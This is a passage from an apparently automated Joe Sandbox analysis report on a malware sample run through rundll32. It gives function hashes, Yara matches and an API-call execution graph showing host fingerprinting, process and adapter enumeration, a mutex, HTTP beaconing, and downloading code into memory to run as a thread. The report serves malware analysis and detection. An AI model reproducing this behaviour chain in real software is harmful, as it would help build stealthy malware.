                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                      • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 0da5a77b1d795fb6707756be2b86fd123b89f025793bdf999121e2e314aa4dac
                                                                                                                      • Instruction ID: 7189fadd19c05f0b16517cb3fcd21573d102caadb62aefbd625eb7048705db04
                                                                                                                      • Opcode Fuzzy Hash: 0da5a77b1d795fb6707756be2b86fd123b89f025793bdf999121e2e314aa4dac
                                                                                                                      • Instruction Fuzzy Hash: 60B0923CA111A8C7FA2727AAA848328EA20BB4E741F1A9469C60A27388CA2595478741
                                                                                                                      Function 00000292116A11C0 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 131 292116a11c0-292116a11f0 VirtualAlloc
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                      • Instruction ID: 8262a10ab272d9c0a90b37f90d44940d5c746677a48ccca2f8ca7a6157593f64
                                                                                                                      • Opcode Fuzzy Hash: a26db5a74adc6119d098d68705d28c1916c0da013186a83d7531f391c9707544
                                                                                                                      • Instruction Fuzzy Hash: 0DD05EB1B04680C3C7248B20E40060A7B60F384744F504018DA8C43B54CA3EC215CF00

                                                                                                                      Non-executed Functions

                                                                                                                      Function 000000026E7A1730 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                      • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: QueryVirtual
                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                      • API String ID: 1804819252-1534286854
                                                                                                                      • Opcode ID: 5659cc6253d3337fcbf5b9313850b0995babe0cbae9eea9f4b305dcd2399b235
                                                                                                                      • Instruction ID: 298b71a9dd78cf2edb974784e477093bc34c92c347835cd00dc09d550e05ad20
                                                                                                                      • Opcode Fuzzy Hash: 5659cc6253d3337fcbf5b9313850b0995babe0cbae9eea9f4b305dcd2399b235
                                                                                                                      • Instruction Fuzzy Hash: 6541C2BA701B4482FF12EB15E8487A9F7A0F785BD0F464164DA4D0B7A5EB3AC949C780
                                                                                                                      Function 00000292116A26B0 Relevance: 6.4, APIs: 5, Instructions: 132COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                      • Instruction ID: b08b89aab51c6cc187fdb6afd6013d7ca7a7712bf619ad307f38713a2bca3a3b
                                                                                                                      • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                      • Instruction Fuzzy Hash: C1511136658B94D6DB64CB19F49432AB7A0F7C8B84F100525FB8E877A6DB3DC498CB04
                                                                                                                      Function 000000026E7A1010 Relevance: 6.1, APIs: 4, Instructions: 107sleepCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 191 26e7a1010-26e7a1024 192 26e7a10a0-26e7a10a3 191->192 193 26e7a1026-26e7a102e 191->193 196 26e7a1084 192->196 197 26e7a10a5-26e7a10c2 192->197 194 26e7a1030-26e7a104e 193->194 195 26e7a1089-26e7a1097 193->195 198 26e7a1058-26e7a1066 194->198 196->195 199 26e7a10d9-26e7a10e4 197->199 202 26e7a1050-26e7a1055 Sleep 198->202 203 26e7a1068-26e7a1074 198->203 200 26e7a10c8-26e7a10cb 199->200 201 26e7a10e6 199->201 207 26e7a1160-26e7a1165 200->207 208 26e7a10d1-26e7a10d6 Sleep 200->208 204 26e7a10e8-26e7a10f4 201->204 202->198 205 26e7a107a-26e7a107f _amsg_exit 203->205 206 26e7a1140-26e7a1155 call 26e7a2450 203->206 209 26e7a10fa-26e7a10fe 204->209 210 26e7a11c0-26e7a11ca call 26e7a24c8 204->210 205->196 206->196 207->204 208->199 212 26e7a1180-26e7a1199 _initterm 209->212 213 26e7a1104-26e7a1109 209->213 210->213 212->213 216 26e7a11a0-26e7a11b9 call 26e7a24d0 213->216 217 26e7a110f-26e7a1111 213->217 216->217 220 26e7a1170-26e7a1175 217->220 221 26e7a1113-26e7a1120 217->221 220->221 223 26e7a112f-26e7a113b 221->223 224 26e7a1122-26e7a112a 221->224 223->195 224->223
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2937147216.000000026E7A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 000000026E7A0000, based on PE: true
                                                                                                                      • Associated: 00000012.00000002.2937105023.000000026E7A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000012.00000002.2937147216.000000026E7E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_26e7a0000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep_amsg_exit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1015461914-0
                                                                                                                      • Opcode ID: dfb423db6d7f2f99e71afb77657b4e79f394086b29d41546b4ffe580ebe9380d
                                                                                                                      • Instruction ID: 1519187e1003702a2413edca5e237f583de2b2ee7340e728da19977fef088c9a
                                                                                                                      • Opcode Fuzzy Hash: dfb423db6d7f2f99e71afb77657b4e79f394086b29d41546b4ffe580ebe9380d
                                                                                                                      • Instruction Fuzzy Hash: BF418B7D30528485FF63AB1EEC5876AF3A5A744BC4F164025DE088B795EE2BCC899381
                                                                                                                      Function 00000292116A1C80 Relevance: 5.2, APIs: 4, Instructions: 177COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000292116A0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_18_2_292116a0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                      • Instruction ID: 061f87bd63ff4c676daad6399f64fffe1f169c943fb037450979fea58f555f91
                                                                                                                      • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                      • Instruction Fuzzy Hash: 67919936619B84C6DB60CB0AE49435AB7A4F7C8BD4F504116EB8E87BA9DF3DC494CB00

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:10.8%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:5.6%
                                                                                                                      Total number of Nodes:764
                                                                                                                      Total number of Limit Nodes:12
                                                                                                                      execution_graph 2676 13a435a 2677 13a4174 2676->2677 2678 13a42a7 2676->2678 2679 13a4221 2677->2679 2680 13a41a1 2677->2680 2682 13a423a HttpOpenRequestA 2679->2682 2681 13a41ba HttpOpenRequestA 2680->2681 2685 13a429f 2681->2685 2682->2685 2685->2678 2686 13a42d9 2685->2686 2687 13a42b6 InternetSetOptionA 2685->2687 2688 13a432b HttpSendRequestA 2686->2688 2689 13a42e3 2686->2689 2687->2686 2688->2678 2690 13a4300 HttpSendRequestA 2689->2690 2690->2678 2691 13a3288 2696 13a30b0 2691->2696 2693 13a3291 2694 13a32af 2693->2694 2721 13aa5cc NtDelayExecution 2693->2721 2697 13a30d0 2696->2697 2722 13a5344 2697->2722 2699 13a30d9 2699->2693 2700 13a30d5 2700->2699 2734 13a6e74 2700->2734 2704 13a3104 2704->2699 2705 13a7134 4 API calls 2704->2705 2706 13a311f 2705->2706 2706->2699 2707 13a3135 GetCurrentProcess IsWow64Process 2706->2707 2707->2699 2708 13a3162 2707->2708 2745 13a5904 GetAdaptersInfo 2708->2745 2710 13a3167 2710->2699 2711 13a31a1 CreateMutexW 2710->2711 2711->2699 2712 13a31c1 GetLastError 2711->2712 2712->2699 2713 13a31e4 GetModuleHandleW 2712->2713 2752 13a3bd0 GetModuleHandleW GetCurrentProcessId 2713->2752 2719 13a3219 2719->2699 2774 13a52fc CreateThread 2719->2774 2721->2693 2724 13a534d 2722->2724 2723 13a5383 2723->2700 2724->2723 2776 13a8df4 2724->2776 2735 13a6e92 2734->2735 2736 13a6eaf 2735->2736 2737 13a6ea4 RtlGetVersion 2735->2737 2738 13a6eb9 GetVersionExW 2736->2738 2739 13a30fb 2736->2739 2737->2736 2738->2739 2740 13a7134 CreateToolhelp32Snapshot 2739->2740 2741 13a9674 2740->2741 2742 13a7164 Process32FirstW 2741->2742 2743 13a719e CloseHandle 2742->2743 2744 13a7180 Process32NextW 2742->2744 2743->2704 2744->2743 2744->2744 2746 13a593d 2745->2746 2751 13a5961 2745->2751 2747 13a958c NtAllocateVirtualMemory 2746->2747 2749 13a5948 GetAdaptersInfo 2747->2749 2748 13a596f 2748->2710 2749->2751 2750 13a6814 NtFreeVirtualMemory 2750->2748 2751->2748 2751->2750 2852 13a6854 2752->2852 2756 13a3c23 2757 13a6e74 2 API calls 2756->2757 2758 13a3cbb GetCurrentProcessId 2756->2758 2759 13a3cd7 2756->2759 2757->2756 2758->2756 2760 13a3ce8 2759->2760 2761 13a31f9 2759->2761 2862 13a3cfc 2760->2862 2761->2699 2763 13a59a4 2761->2763 2764 13a958c NtAllocateVirtualMemory 2763->2764 2765 13a59bc 2764->2765 2895 13aa064 2765->2895 2767 13a5a0f 2768 13aa064 NtAllocateVirtualMemory 2767->2768 2769 13a3209 2768->2769 2769->2699 2770 13a5880 2769->2770 2771 13a5898 2770->2771 2772 13aa064 NtAllocateVirtualMemory 2771->2772 2773 13a58d3 2772->2773 2773->2719 2775 13a5333 2774->2775 2898 13a47fc 2774->2898 2775->2699 2779 13a93d4 2776->2779 2777 13a535f 2777->2723 2780 13a7cdc 2777->2780 2779->2777 2796 13a6fb0 2779->2796 2783 13a8b39 2780->2783 2781 13a5368 2781->2723 2784 13a8cd4 2781->2784 2782 13a6fb0 GetProcAddress 2782->2783 2783->2781 2783->2782 2787 13a8d97 2784->2787 2785 13a5371 2785->2723 2788 13a78a4 2785->2788 2787->2785 2800 13a8ba8 2787->2800 2791 13a7c6f 2788->2791 2789 13a537a 2789->2723 2792 13a94a8 2789->2792 2790 13a6fb0 GetProcAddress 2790->2791 2791->2789 2791->2790 2795 13a9519 2792->2795 2793 13a9576 2793->2723 2794 13a6fb0 GetProcAddress 2794->2795 2795->2793 2795->2794 2797 13a6fca 2796->2797 2798 13a6fd1 2796->2798 2797->2779 2798->2797 2799 13a70bb GetProcAddress 2798->2799 2799->2797 2812 13a72cc 2800->2812 2802 13a8bc5 2802->2787 2803 13a8bb8 2803->2802 2818 13aa01c 2803->2818 2805 13a8c07 2805->2802 2806 13a8c2d FindFirstFileW 2805->2806 2809 13a8c6b 2806->2809 2810 13a8c4d 2806->2810 2808 13a8c54 FindNextFileW 2808->2809 2808->2810 2822 13a6814 2809->2822 2810->2808 2810->2809 2811 13a8ca6 LoadLibraryW 2810->2811 2811->2809 2825 13a9674 2812->2825 2815 13a730c 2815->2803 2816 13a72f6 2827 13aa0b0 2816->2827 2819 13aa034 2818->2819 2832 13a9fb0 2819->2832 2821 13aa05d 2821->2805 2823 13a682e NtFreeVirtualMemory 2822->2823 2824 13a684f 2822->2824 2823->2824 2824->2802 2826 13a72e2 GetSystemDirectoryW 2825->2826 2826->2815 2826->2816 2830 13a958c NtAllocateVirtualMemory 2827->2830 2829 13aa0d8 2829->2815 2831 13a95cc 2830->2831 2831->2829 2835 13a98b0 2832->2835 2834 13a9fe4 2834->2821 2836 13a98df 2835->2836 2837 13a98c4 2835->2837 2841 13a97f4 2836->2841 2838 13a6814 NtFreeVirtualMemory 2837->2838 2840 13a98d1 2838->2840 2840->2834 2842 13a981b 2841->2842 2843 13a9825 2841->2843 2849 13a9634 2842->2849 2846 13a958c NtAllocateVirtualMemory 2843->2846 2848 13a9844 2843->2848 2845 13a9851 2845->2840 2846->2848 2847 13a6814 NtFreeVirtualMemory 2847->2845 2848->2845 2848->2847 2850 13a9649 VirtualQuery 2849->2850 2851 13a9645 2849->2851 2850->2851 2851->2843 2865 13a720c 2852->2865 2857 13a7318 2858 13a9674 2857->2858 2859 13a7336 GetUserNameA 2858->2859 2860 13a734a wsprintfA 2859->2860 2861 13a7363 2859->2861 2860->2861 2861->2756 2863 13a3d0a CloseHandle 2862->2863 2864 13a3d17 2862->2864 2863->2864 2864->2761 2866 13a722a 2865->2866 2867 13a723c FindFirstVolumeW 2866->2867 2868 13a685d 2867->2868 2869 13a725d GetVolumeInformationW FindVolumeClose 2867->2869 2870 13a73f4 2868->2870 2869->2868 2871 13a741d 2870->2871 2880 13a75a4 2871->2880 2874 13a3c17 2874->2857 2875 13a958c NtAllocateVirtualMemory 2876 13a743f 2875->2876 2877 13a746d 2876->2877 2885 13a9f08 2876->2885 2879 13a6814 NtFreeVirtualMemory 2877->2879 2879->2874 2881 13a958c NtAllocateVirtualMemory 2880->2881 2882 13a75c0 2881->2882 2883 13a7427 2882->2883 2889 13a74a4 2882->2889 2883->2874 2883->2875 2886 13a9f20 2885->2886 2892 13a9f50 2886->2892 2888 13a9f49 2888->2877 2890 13a74c6 2889->2890 2891 13a74e1 wsprintfA 2890->2891 2891->2883 2893 13a98b0 3 API calls 2892->2893 2894 13a9f7f 2893->2894 2894->2888 2896 13a958c NtAllocateVirtualMemory 2895->2896 2897 13aa080 2896->2897 2897->2767 2902 13a4885 2898->2902 2899 13a4925 2901 13a958c NtAllocateVirtualMemory 2911 13a48f2 new[] 2901->2911 2902->2911 2980 13aa5cc NtDelayExecution 2902->2980 2905 13aa064 NtAllocateVirtualMemory 2905->2911 2906 13a4dff wsprintfA 2907 13a9f08 3 API calls 2906->2907 2907->2911 2908 13a4beb wsprintfA 2908->2911 2909 13a4cda wsprintfA 2909->2911 2911->2899 2911->2901 2911->2905 2911->2906 2911->2908 2911->2909 2912 13a9f08 3 API calls 2911->2912 2916 13a6814 NtFreeVirtualMemory 2911->2916 2921 13a51bb 2911->2921 2923 13a4370 2911->2923 2934 13a6984 2911->2934 2960 13a5650 2911->2960 2964 13a3dcc 2911->2964 2981 13aaab8 2911->2981 2987 13a538c 2911->2987 2991 13a44c8 2911->2991 2912->2911 2916->2911 2917 13a71b8 GetCursorPos GetTickCount RtlRandom 2917->2921 2919 13a5260 GetExitCodeThread 2919->2921 2920 13a5299 GetExitCodeThread 2920->2921 2921->2911 2921->2917 2921->2919 2921->2920 3001 13aa5cc NtDelayExecution 2921->3001 2924 13a43a8 2923->2924 2925 13a958c NtAllocateVirtualMemory 2924->2925 2926 13a43ce 2925->2926 2927 13a958c NtAllocateVirtualMemory 2926->2927 2928 13a43e4 InternetCrackUrlA 2927->2928 2929 13a445a 2928->2929 2930 13a4440 2928->2930 2929->2911 2931 13a6814 NtFreeVirtualMemory 2930->2931 2932 13a444d 2931->2932 2933 13a6814 NtFreeVirtualMemory 2932->2933 2933->2929 2935 13a958c NtAllocateVirtualMemory 2934->2935 2936 13a69b2 2935->2936 2937 13a69c6 GetAdaptersInfo 2936->2937 2947 13a69bf 2936->2947 2938 13a69ed 2937->2938 2958 13a6bbb 2937->2958 2939 13a958c NtAllocateVirtualMemory 2938->2939 2941 13a69f8 GetAdaptersInfo 2939->2941 2940 13a6be8 2943 13a958c NtAllocateVirtualMemory 2940->2943 2944 13a6a25 2941->2944 2942 13a6814 NtFreeVirtualMemory 2942->2940 2945 13a6bfb 2943->2945 2950 13a6a46 wsprintfA 2944->2950 2946 13a6c0c GetComputerNameExA 2945->2946 2945->2947 2948 13a6c89 GetComputerNameExA 2946->2948 2952 13a6c25 2946->2952 2947->2911 2949 13a6d3b 2948->2949 2954 13a6ca6 2948->2954 2951 13a6814 NtFreeVirtualMemory 2949->2951 2955 13a6a62 2950->2955 2951->2947 2953 13a6c5a wsprintfA 2952->2953 2953->2948 2956 13a6d06 wsprintfA 2954->2956 2957 13a6b87 wsprintfA 2955->2957 2955->2958 2959 13a6b12 wsprintfA 2955->2959 2956->2949 2957->2955 2957->2958 2958->2940 2958->2942 2959->2955 2961 13a5665 2960->2961 2963 13a5676 2960->2963 2962 13a958c NtAllocateVirtualMemory 2961->2962 2961->2963 2962->2963 2963->2911 2966 13a3e01 2964->2966 2965 13a4370 3 API calls 2965->2966 2966->2965 2967 13a3e6a 2966->2967 2971 13a3f61 2966->2971 2977 13a6814 NtFreeVirtualMemory 2966->2977 2978 13a3fb0 2966->2978 3002 13a4004 2966->3002 3007 13a40dc 2966->3007 2967->2966 2968 13a3d1c InternetOpenW InternetConnectA 2967->2968 2969 13a6814 NtFreeVirtualMemory 2967->2969 2970 13aa064 NtAllocateVirtualMemory 2967->2970 2967->2971 2968->2967 2969->2967 2970->2967 2972 13a3fda InternetCloseHandle 2971->2972 2973 13a3fe5 2971->2973 2972->2973 2975 13a3ff8 2973->2975 2976 13a3fed InternetCloseHandle 2973->2976 2975->2911 2976->2975 2977->2966 2978->2971 2980->2902 2985 13aaac6 2981->2985 2986 13aaac8 2981->2986 2982 13aab16 2984 13a6814 NtFreeVirtualMemory 2982->2984 2983 13a6814 NtFreeVirtualMemory 2983->2986 2984->2985 2985->2911 2986->2982 2986->2983 2988 13a53a2 2987->2988 2989 13a958c NtAllocateVirtualMemory 2988->2989 2990 13a53bf 2988->2990 2989->2990 2990->2911 2992 13a4532 2991->2992 2993 13aa064 NtAllocateVirtualMemory 2992->2993 2995 13a4553 2993->2995 2994 13a4560 2994->2911 2995->2994 2996 13aaab8 NtFreeVirtualMemory 2995->2996 2997 13a47e4 2995->2997 3020 13aa954 2995->3020 3030 13a32c8 2995->3030 2996->2995 2998 13a6814 NtFreeVirtualMemory 2997->2998 2998->2994 3001->2921 3003 13a404d InternetReadFile 3002->3003 3005 13a4095 3003->3005 3006 13a406f 3003->3006 3004 13a98b0 3 API calls 3004->3006 3005->2967 3006->3003 3006->3004 3006->3005 3008 13a412b 3007->3008 3009 13a41a1 3008->3009 3010 13a4221 3008->3010 3011 13a41d6 HttpOpenRequestA 3009->3011 3012 13a4256 HttpOpenRequestA 3010->3012 3013 13a429f 3011->3013 3012->3013 3014 13a42d9 3013->3014 3015 13a42b6 InternetSetOptionA 3013->3015 3017 13a42a7 3013->3017 3016 13a432b HttpSendRequestA 3014->3016 3018 13a42e3 3014->3018 3015->3014 3016->3017 3017->2966 3019 13a4300 HttpSendRequestA 3018->3019 3019->3017 3021 13aa970 3020->3021 3022 13a958c NtAllocateVirtualMemory 3021->3022 3023 13aa9a7 3021->3023 3024 13aa9d7 3022->3024 3023->2995 3024->3023 3025 13aa064 NtAllocateVirtualMemory 3024->3025 3026 13aaa09 3025->3026 3027 13a958c NtAllocateVirtualMemory 3026->3027 3028 13aaa28 3027->3028 3028->3023 3029 13a6814 NtFreeVirtualMemory 3028->3029 3029->3023 3056 13a32e7 3030->3056 3031 13a35b8 3033 13a35bf 3031->3033 3034 13a361d ExitProcess 3031->3034 3032 13a357d 3035 13a35f0 3032->3035 3036 13a3584 3032->3036 3038 13a35ca 3033->3038 3039 13a3650 3033->3039 3037 13a35b3 3034->3037 3057 13a6178 3035->3057 3041 13a358f 3036->3041 3042 13a3667 3036->3042 3037->2995 3038->3037 3194 13a62d0 3038->3194 3130 13a36a4 3039->3130 3043 13a359a 3041->3043 3044 13a363b 3041->3044 3174 13a1a08 3042->3174 3047 13a3649 3043->3047 3048 13a35a5 3043->3048 3097 13a1c38 CreateToolhelp32Snapshot 3044->3097 3129 13a2118 CreateThread 3047->3129 3050 13a35ac 3048->3050 3051 13a3607 3048->3051 3050->3037 3082 13a5c48 3050->3082 3070 13a5e20 3051->3070 3056->3031 3056->3032 3058 13a6197 3057->3058 3059 13a61a4 MultiByteToWideChar 3058->3059 3205 13a5f64 3059->3205 3062 13a62b3 3063 13a62ac 3062->3063 3064 13a6814 NtFreeVirtualMemory 3062->3064 3063->3037 3064->3063 3065 13a621f VirtualAlloc 3066 13a6252 3065->3066 3067 13a958c NtAllocateVirtualMemory 3066->3067 3068 13a625c CreateThread 3067->3068 3069 13a6814 NtFreeVirtualMemory 3068->3069 3069->3063 3257 13a686c 3070->3257 3072 13a5e43 3080 13a5e50 3072->3080 3265 13a71b8 3072->3265 3075 13a6814 NtFreeVirtualMemory 3076 13a5ebf 3075->3076 3077 13a5ee7 MultiByteToWideChar 3076->3077 3078 13a5f64 12 API calls 3077->3078 3079 13a5f2f 3078->3079 3079->3080 3271 13a9984 3079->3271 3080->3037 3083 13a5c87 3082->3083 3084 13a686c 4 API calls 3083->3084 3086 13a5cb3 3084->3086 3085 13a5cc0 3085->3037 3086->3085 3087 13a71b8 3 API calls 3086->3087 3088 13a5d0a wsprintfW 3087->3088 3089 13a6814 NtFreeVirtualMemory 3088->3089 3090 13a5d2f 3089->3090 3091 13a5d54 MultiByteToWideChar 3090->3091 3092 13a5f64 12 API calls 3091->3092 3093 13a5d99 3092->3093 3094 13a5db9 MultiByteToWideChar 3093->3094 3094->3085 3095 13a5ded 3094->3095 3095->3085 3277 13a9a50 3095->3277 3098 13a958c NtAllocateVirtualMemory 3097->3098 3099 13a1c87 3098->3099 3100 13a9f08 3 API calls 3099->3100 3101 13a1cd0 3100->3101 3102 13a1cdc Process32First 3101->3102 3103 13a20f6 3101->3103 3104 13a1d06 Process32Next 3102->3104 3105 13a1d27 3102->3105 3106 13a9f08 3 API calls 3103->3106 3104->3104 3104->3105 3108 13a958c NtAllocateVirtualMemory 3105->3108 3107 13a2107 3106->3107 3107->3037 3109 13a1d37 Process32First 3108->3109 3110 13a1d53 3109->3110 3111 13a1da0 Process32First 3109->3111 3112 13a1d5b Process32Next 3110->3112 3113 13a20e1 3111->3113 3118 13a1dbb 3111->3118 3112->3111 3112->3112 3114 13a6814 NtFreeVirtualMemory 3113->3114 3115 13a20eb CloseHandle 3114->3115 3115->3103 3116 13a20c6 Process32Next 3116->3113 3116->3118 3117 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3117->3118 3118->3116 3118->3117 3119 13a1edb wsprintfA 3118->3119 3120 13a9f08 3 API calls 3119->3120 3122 13a1f08 3120->3122 3121 13a9f08 3 API calls 3121->3122 3122->3121 3123 13a1f81 wsprintfA 3122->3123 3124 13a9f08 3 API calls 3123->3124 3127 13a1fae 3124->3127 3126 13a9f08 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3126->3127 3127->3126 3128 13a9f08 3 API calls 3127->3128 3286 13a14d8 CreateToolhelp32Snapshot 3127->3286 3128->3116 3129->3037 3131 13a36e4 3130->3131 3132 13a958c NtAllocateVirtualMemory 3131->3132 3133 13a3710 3132->3133 3134 13a958c NtAllocateVirtualMemory 3133->3134 3135 13a371f 3134->3135 3136 13a686c 4 API calls 3135->3136 3138 13a372e 3136->3138 3137 13a373b 3137->3037 3138->3137 3139 13a71b8 3 API calls 3138->3139 3140 13a37d1 wsprintfW 3139->3140 3141 13a37fb 3140->3141 3142 13a3822 wsprintfW 3141->3142 3143 13a384c 3142->3143 3144 13aa0b0 NtAllocateVirtualMemory 3143->3144 3145 13a3858 3144->3145 3146 13a5bb8 3 API calls 3145->3146 3147 13a3867 3146->3147 3148 13a9f50 3 API calls 3147->3148 3149 13a38a0 3148->3149 3150 13a9f08 3 API calls 3149->3150 3164 13a38ed 3150->3164 3152 13a6814 NtFreeVirtualMemory 3153 13a3b86 3152->3153 3154 13a6814 NtFreeVirtualMemory 3153->3154 3155 13a3b99 3154->3155 3157 13a6814 NtFreeVirtualMemory 3155->3157 3156 13a71b8 3 API calls 3158 13a393f wsprintfW 3156->3158 3159 13a3bac 3157->3159 3160 13a396f 3158->3160 3161 13a6814 NtFreeVirtualMemory 3159->3161 3162 13a3979 MultiByteToWideChar 3160->3162 3161->3137 3163 13a5f64 12 API calls 3162->3163 3163->3164 3164->3156 3165 13a71b8 3 API calls 3164->3165 3171 13a39c9 3164->3171 3172 13a3b31 wsprintfW 3164->3172 3302 13a650c 3164->3302 3166 13a3a0e wsprintfW 3165->3166 3168 13a3a3b 3166->3168 3167 13a3a62 wsprintfW 3167->3168 3168->3167 3169 13a3aa1 MultiByteToWideChar 3168->3169 3170 13a5f64 12 API calls 3169->3170 3170->3164 3171->3152 3173 13a9a50 5 API calls 3172->3173 3173->3164 3175 13a958c NtAllocateVirtualMemory 3174->3175 3176 13a1a1b 3175->3176 3177 13a9f08 3 API calls 3176->3177 3178 13a1a5b 3177->3178 3312 13a68f8 3178->3312 3180 13a1a6e 3181 13a1bdb 3180->3181 3184 13a9f08 3 API calls 3180->3184 3182 13a1bed 3181->3182 3183 13a6814 NtFreeVirtualMemory 3181->3183 3185 13a9f08 3 API calls 3182->3185 3183->3182 3186 13a1aba FindFirstFileA 3184->3186 3187 13a1c28 3185->3187 3186->3181 3193 13a1ade 3186->3193 3187->3037 3188 13a1bb5 FindNextFileA 3189 13a1bd0 FindClose 3188->3189 3188->3193 3189->3181 3190 13a9f08 3 API calls 3190->3193 3191 13a1b80 wsprintfA 3192 13a9f08 3 API calls 3191->3192 3192->3193 3193->3188 3193->3190 3193->3191 3195 13a62eb 3194->3195 3196 13a62f8 MultiByteToWideChar 3195->3196 3197 13a5f64 12 API calls 3196->3197 3198 13a6349 3197->3198 3199 13a958c NtAllocateVirtualMemory 3198->3199 3204 13a6408 3198->3204 3200 13a637e 3199->3200 3201 13a958c NtAllocateVirtualMemory 3200->3201 3202 13a63a1 CreateThread 3201->3202 3203 13a6814 NtFreeVirtualMemory 3202->3203 3203->3204 3204->3037 3214 13a5fa4 3205->3214 3207 13a6008 3208 13a613d 3207->3208 3209 13a6814 NtFreeVirtualMemory 3207->3209 3210 13a6148 3208->3210 3211 13a6814 NtFreeVirtualMemory 3208->3211 3209->3208 3210->3062 3210->3065 3211->3210 3212 13aa0b0 NtAllocateVirtualMemory 3212->3214 3214->3207 3214->3212 3216 13a75e8 3214->3216 3228 13a5bb8 3214->3228 3240 13a67a0 3214->3240 3217 13a7627 InternetOpenW 3216->3217 3218 13a7662 3217->3218 3219 13a7667 InternetOpenUrlW 3217->3219 3221 13a7791 3218->3221 3222 13a7786 InternetCloseHandle 3218->3222 3219->3218 3227 13a76a3 3219->3227 3220 13a76ae InternetReadFile 3220->3227 3223 13a7799 InternetCloseHandle 3221->3223 3224 13a77a4 3221->3224 3222->3221 3223->3224 3224->3214 3225 13a958c NtAllocateVirtualMemory 3225->3227 3226 13a97f4 3 API calls 3226->3227 3227->3218 3227->3220 3227->3225 3227->3226 3246 13a7840 3228->3246 3231 13aa01c 3 API calls 3232 13a5bf3 3231->3232 3233 13aa01c 3 API calls 3232->3233 3235 13a5c2e 3232->3235 3236 13a5c09 3233->3236 3234 13a5bdb 3234->3214 3235->3234 3237 13a6814 NtFreeVirtualMemory 3235->3237 3236->3235 3238 13a5c0d 3236->3238 3237->3234 3239 13a6814 NtFreeVirtualMemory 3238->3239 3239->3234 3251 